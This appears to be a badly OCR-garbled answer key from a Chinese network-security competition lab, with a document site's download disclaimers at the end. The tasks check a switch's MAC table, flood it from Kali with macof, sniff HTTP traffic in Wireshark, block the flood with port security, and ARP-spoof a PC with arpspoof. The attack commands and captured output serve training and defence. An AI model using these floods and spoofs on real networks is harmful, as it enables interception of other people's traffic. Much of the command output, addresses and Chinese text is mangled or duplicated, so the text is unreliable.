!13?iiil!Ii!Ir.I:"ifCDFlfigpfhO Linkencap:EthernetHWaddr00:Ck:79;諷;62:6c, znetaddr:132.16B.1.213 &:ast;192,16fi_L255Mask:255,255,255.0znetBaddr.te30: 20匚:Z9ff:fea4:626匚『HAScope:LinkUPBRDAtKASTHUMMINGMULTICfcSIMTU:1S00Metric:1RXpackets358errors:0drop^di0overruns:0fsane:0IXpackets44prror^;0droppsd:0overruns;0carrier:Qtollisione-DtiqueuEten:IODO? RX.bytes:2^064(24.4 TKbytes:7652|7-4KiB)lo LinkeriEap:LoealLoopbaEkinetdddr;127.DD1Mask;255.00.0inetSaddr:;;11/12B5匚ppe:HostUPLDDPE^C^RUNTdIFJEHTUi65536Hetri匚:IpackeitE.57errors.Qdro口口巨d:0ojerrljns:0frame:0IXpackets57errors:0dropped:Doverruns:0carrier:0coll,isions-DtMqueuelen;0RXbytes:Z1713(21,2KiB>TXbytes:21713(21.2KiB)三個(gè)終端之間能夠相互Ping通;-三個(gè)終端之間能夠相互Ping通;-\Dac;u.iRicnit^43kndSe inrg[3SAidlnini-3<:Fat;or^i^G-Dfir£gindcvjs:IPConfigrurationEthetnec盤daptE片本地淫接2.:CnnnflPtdon-eperifitDNSSuFf1* .:IPAddicta :1?2A£0.1.2e4Subnethas^ 255 _255_255.0DefaultGateua^p . .?:3i\DacufticntA?ndCe4:tin^5^dinLniatrLfttoi->—C= find iniDtvu^or192.1^8.1^211Pintj'inof19?.168.1.211with12bjt?*sofdata-ReplvReplvReplyReplyFramFr?mFromFrom112.1G8.1.211:hyt?H3a1T2.1G8.1.211ReplvReplvReplyReplyFramFr?mFromFrom112.1G8.1.211:hyt?H3a1T2.1G8.1.211:bvt?-32lf2.1G8.1.211:bytas-331T2.1G8.1.211:bvtes-3atime<ln$time<linscine<lnstinc<1nsriL-121TTL=128rTL-128111-128Pin暫statiatic^for192.1&8.1.211Pin暫statiatic^for192.1&8.1.211:Fackets:Sent?4?Keaeiued■4,Lost?U<WXlossJ,Hpproximditeroundtriptlme^inmilli-seconds:Hininun-0ms,H^xinum■Onu,Average■皿maC-SEuuutriellLsandSetLxn^a^ilmi.iiis(Li*a€uF^pJ.liyJ.72.160-1-21JPinning192.1&S.1.313uxth金2b^tssofdata-ReplyRedMReplvReplvft"painfromframfrtiiTi192ltfl.1.213:b.,teReplyRedMReplvReplvft"painfromframfrtiiTi192ltfl.1.213:b.,teE=32192.ItS_1_213:Jb!jtes=32192.It8-1-213:hi/tes=32l?2.1fc8-l.213:bj/tes=32Itlime=2mstiiine=liistiinie=lmstine=lmisTTL=64TTL=64TTL=64TTL=64Pingstat1sticsfor192?1&8.1.213:Packets:Sent=4,Received=4*Lost=9(0zIiqws》.ApproxijiiateFoundti*lptlines:innilli—seconds:liininuFi=Im菠鼻Hiaxiinvunt=2d害事Average=lims在同一個(gè)窗口ping通除了本機(jī)外的2個(gè)IP地址;查看DCR安換機(jī)VLAN1(的MAC地址表容量信息,并將DCRS交換機(jī)配置相關(guān)參數(shù)、查看命令、查看結(jié)果截圖。(3分)#showmac-address-tablecountvian10dcrs-5650-28(r4)(confmac-address-tablecountvlan10computethenumberofoiacaddressMaxentriescanbecreatedinthe1argestcapacitycard;TOC\o"1-5"\h\zTotal Filter Entry Number is: 16384Stafic Filter Entry Number is: 10384unicast Fi1ter Entry Number is: LG354Currententrieshavebeencrearedinthesystem:Toral FilterEntryNumberis:Sind5v?dualFilterEntryNumberis:8static FilterEntryNumberis:0Dynamic FilterEntryNumberis:8DCRS-565O-2B(lt4j(conf1g>#DCRSfe址表空間中有可用的空間;當(dāng)前地址表記錄數(shù)少于地址表容量;MaxentiresTotal……:16384CurrententiresTotal :該數(shù)值小于10從Kali發(fā)起MACFlooding滲透測(cè)試,使DCRS<換機(jī)的MAC地址表溢出,使其在MAC地址表溢出的條件下,無法學(xué)習(xí)到PC1和DCST中的WebServ2003服務(wù)器的MAC地址表信息,查看DCR交換機(jī)的MAC地址表信息,并將滲透測(cè)試過程截圖。(5分)

Kali#macofVM -Filt;EditSew'^rmindlHdpiwin512de:a2±leiIS:32te2 15±e?:M:5be.e.fi.eHIM>A.B.B.A.325M-£92444Ml;e)win512TOC\o"1-5"\h\z31:31:2c 氛筑孔8利抽1> S2?1MM(?1winIU8b:45tal:&a:43:71c9t3B:77t49rc4:ale.e.O.e,52SW>9,2979:5Lfie27B2LS4llfl62782I94(e)win512 *37:42±>2:?:b:2Aflfl: I7?e.6.e.e.51M2*G.A.B.B.JMftTt52241183271I3ai27lA]win512 一d;dB:47:2c;74;fe酬泊f;舁;】4:M;H積專用沖>?.?.*?.3?MtrVlV731?U4;Lft75iei3fi(e)win512 亠I」:[::弋匕:叱:tipfV「」:吃斗/?U.O.H.J.2ZE10a0.&.€.J. i15223/fc^Lt'■162237HUC?)win512Cl:M:l:3C:bt(aCeidfidCiM^betCe?上母+趴竝訊7>?用.氛氛仃町加519439923?:1^43992352(0)win512d3:7f;b7;2;34;rt37s31:74:?:42;f??.?.?.?.34291*?.?.?,1.122271S2?33W<M4:1ei3598444(0)win5125fl!aa:171&4!5d:7f3<LTi3!Mi7l43:? >e.0.B.Q.1492!S1374249BSD:13742441^6;e:Win,129b:rdtde:0H4:d(eb!91:81:7diJf129 A?.■.^■.41144:514343^9*6^1vifi512 | II.fd:af:n.c:lb;cGb-1:J43二3a:ifJ.*?.$.□^545“飢0用、?訴換:£甜舶,7J時(shí):圍&4&97397(0)wMrsiJ^r 豪呵|iif白節(jié) I(2分)#showmac-address-tablecountvlan10Ccwnputethenumberofmacaddress.***MaxentriescanbecreatedintiheFilterEntryMaxentriescanbecreatedintiheFilterEntryNumberis:StaticFilterEntryNinnberis:UnicastFil七總itEntryNuniberxs;l&rgest163841638416384capacityca.cd:inthesystem:16384is:16334016384CurrententrieshavebeencreatedTotalFilterEntryNmubexis:IndividualFxl^terEntryNumberStaticFilterEntryNumberis:DynamicFil七inthesystem:16384is:16334016384當(dāng)前地址表記錄數(shù)等于地址表容量;MaxentiresTotal……:16384Currententires Total……:該數(shù)值=16384(3分)

Kali打開wireshark,驗(yàn)證在DCR咬換機(jī)MAC地址表溢出的條件下,可以監(jiān)聽到PC1訪問DCS沖的WebServ2003服務(wù)器的HTTP流量,并將該驗(yàn)證過程截圖。(5分)PC1通過InternetExplorer 訪問;(截圖)地址欄包含:服務(wù)器場(chǎng)景IP(匹配參數(shù)表服務(wù)器場(chǎng)景IP)/Kali打開wireshark,監(jiān)聽到PC1通過InternetExplorer訪問DCST服務(wù)器場(chǎng)景的HTTP流量;AkEdrtHile-;F^gb◎曲intornals.蟲1AkEdrtHile-;F^gExpressicina.ClearApfjyS呂由FikerlrF『Rmig?24001.:#21b*t日各口廠》wir^ef335尊bit手421bft歸呂 日皿(3^^bit=&)°口ir?t■咱『(耳匚由D匚昭申門垃匸匚引匸:仕:屮胡匕:氐:心氐冷(怙泊I 綃:型人Dst:他日It戚U_ra玄如油d化②也:OCI:叮:陽二InternetProtocol麗1■毗腫A,Srcs1強(qiáng)J犧*25290(192.ies.252.ao),Dst;192,16H+252.Ill(192.168T『0rwrni^?i自n PFutoumlF弓r在Port:2于71刃t弓^157】.Dst口BFt?http(90〉*竪耳?1』Aide1.L&nHfp&rts?tTronsferPrstecuIDOOCCOLOCO2CCQ3CCCCCCMCDD7OCO90皿DOOCCOLOCO2CCQ3CCCCCCMCDD7OCO90皿Cnflart52 54 OQ 叩01 97 日丁 fd 切fc 6f df ? □29 d3 3d □2f312b刮03L383日^)1出&吞號(hào)@37孔昌6975C4a6f6c3日20&6^b365?07-Tb*AlTip節(jié)小咼■TJldb7b

爐54□ia6SSf00#sIB502e石HBe72□1bC..H*■啟■龍■乙*.D.E.P.L■十■??.P?@)x=.bDET/HTTP/l.l..HOice.^2.ti*niItfe.<Zac?I;n^ii-CC#pt:t3t:IM.11】??Cofllk中豐p”自Ihe-Cc-ntraaa=O..-4Sxt/htirl截圖:Source:PC1的IP地址(與參數(shù)表一致)Destination:服務(wù)器場(chǎng)景的IP地址(與參數(shù)表一致)Protocol:HTTP(5分)在DCR交換機(jī)Kali所連接端口配置PortSecurity特性,阻止Kali發(fā)起MACFlooding滲透測(cè)試,驗(yàn)證此時(shí)DCR咬換機(jī)MAC地址表能夠?qū)W習(xí)到PC1DCST中的WebServ2003服務(wù)器的MAC地址,并將DCR咬換機(jī)相關(guān)配置信息以及驗(yàn)證信息截圖。(8分)配置截圖包含:mac-address-learningcpu-control(2分)在VLAN1(每個(gè)接口全部啟用如下:InterfaceEthernet1/0/Xswitchportport-security(2分)#clearmac-address-tabledynamic(2分)#showmac-address-tablecountvlan10dcrs-5650-28(r4)(config)^showmac-address-tablecountvlan10computethenumberofmacaddress???+Maxentriescanbecreatedinthe1argestcapacitycard:TOC\o"1-5"\h\zTotal Filter Entry Number is: 16?84ST^fic Filter Entry Number is: 1&304unica5t FiIter Entry Number is: 16364Currententr*1eshavebeencreatedinthesystem:Toral FilterEntryNumberis:Sind-fvidualFilterEntryNumberis:8static FilterEntryNumberis:0Dynamic FilterEntryNumberis:8OCRS-5650-23(R4)(config)#DCRSfe址表空間中有可用的空間;當(dāng)前地址表記錄數(shù)少于地址表容量;Maxentires Total……:16384Currententires Total :該數(shù)值小于10(2分)在DCR交換機(jī)配置PortSecurity特性的條件下,Kali再次打開wireshark,監(jiān)聽PC1訪問DCST中的WebServ2003服務(wù)器流量,驗(yàn)證此時(shí)Kali無法監(jiān)聽到PC1訪問DCST中的WebServ2003服務(wù)器的HTTP流量,并將驗(yàn)證過程截圖。(7分)PC1通過InternetExplorer 訪問服務(wù)器場(chǎng)景;(截圖)地址欄包含:服務(wù)器場(chǎng)景IP(匹配參數(shù)表服務(wù)器場(chǎng)景IP)/……Kali打開wireshark,監(jiān)聽不到PC1通過InternetExplorer訪問DCST的HTTP流量;(截圖)Filter:http顯示報(bào)文數(shù):空任務(wù)5:數(shù)據(jù)竊取防護(hù):ARP攻防(45分)1.在PC1訪問DCST中的WebServ2003服務(wù)器時(shí),查看PC1和DCST中的WebServ2003服務(wù)器的ARP緩存信息,并將PC1和DCST中的WebServ2003服務(wù)器的ARP緩存信息截圖。(5分)PC1WebServ2003Ipconfig/all分別顯示PC1WebServ2003的IP和MACPC1的IP和MAC

薄特定冊(cè)DHG丘綴薄特定冊(cè)DHG丘綴.DHCF用 宜屯配證啟用……禾址鋰克|丹丘地址一-DIICTMIA(D疋feBB::fch4:afAl:det:a?h9yl192.1GH.2&2.90<^^>2$E-a55P3EE,B319521307服務(wù)器場(chǎng)景的IP和MACEthicnnctad.apltci'玄地15複2:Canmcction—specif±cDNGGufflxDescription HcaltckRrL8139Famil*;PCIFastEthernetNICPliymbn]、ndldipg■■■■■■■■■三C2-54.00-ft3ADDHCPEnoiled. . .:HqIPhddreas. ?■■■?£ 1?2.1G9.SS2.111Gujbnet ■■■■■■??■■■* 2S&.255.255.0DcraultGatcirMy i 192-1G9-252-1B1PC1通過InternetExplorer 訪問服務(wù)器場(chǎng)景;(截圖)地址欄包含:服務(wù)器場(chǎng)景IP(匹配參數(shù)表服務(wù)器場(chǎng)景IP)/PC1ARP表項(xiàng)內(nèi)容為WebServ2003的IP->WebServ2003的真實(shí)的MACfc: rs\ftdrilliIsIrdtur>dLrp-<0 0X(3Internet地冊(cè)物齊地址192.168.252.lFIfl192-lfifi?ZSZ-11152-54-HH-a3-46-adWebServ2003ARP表項(xiàng)內(nèi)容為PC1的IP->PC1的真實(shí)的MAC

C:xbocimerit?擊ndSettinosMldoiw1$:tratoTnt^rfaca:192.1fiB.2S2.111——-fhd利fl和4InternetDrlrtress Physics1Adrti*Bss TSOpR192,lfe8.Z5Z-9M fc-3f-flh-8c-4B-Za在Kali對(duì)PC1進(jìn)行ARPSpoofing滲透測(cè)試,使PC1無法訪問DCST中的WebServ2003服務(wù)器,PC1的ARP緩存為:DCST中的WebServ2003服務(wù)器IP->Kali的MAC地址,在PC1查看被Kali毒化后的ARP緩存信息,并將該信息截圖。(5分)Kali:#arpspoof-tPC1」PWebServ2003_IP"X世ht:*arpspooft611e:c:2^:^l:5:Bbfc:^fesfifi4?:arprtpl/ is-ate:c:?^:^i;9:lbe:C!29;4i:5:8bfctJf:db:Bc:48:2a 42:arpreply1?2..2^2illisate:c:293ji1:5:Et>£:u:2號(hào):41:5:盹tc:3f:db:8c:<ia;2a <12:arpr*pl當(dāng)192.1G5.252.Ill±5-at;c:29:41fl:c:29t4i:5:abfttif:db:act4d:2aeBf]&42:mrpreply192.its.252.illis-arb:c:29^41:s:ab0;G2F:4L:$;Ebfc;Jf:db;[Jt^a;2a砒曲42:arpreply142.1^8.2^2.111ls-at 29:41:5:sbOiC:2?:<l!5:5bfcilf:dbiac:48:2a朋砒42=arpreply19?,Lfi8252.111isat松口料訥】;5;$b(過程截圖)(2分)PC1ARP表項(xiàng)內(nèi)容為WebServ2003的IP->Kali的MAC善態(tài)霞口:192.169.252■一善態(tài)Inter

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論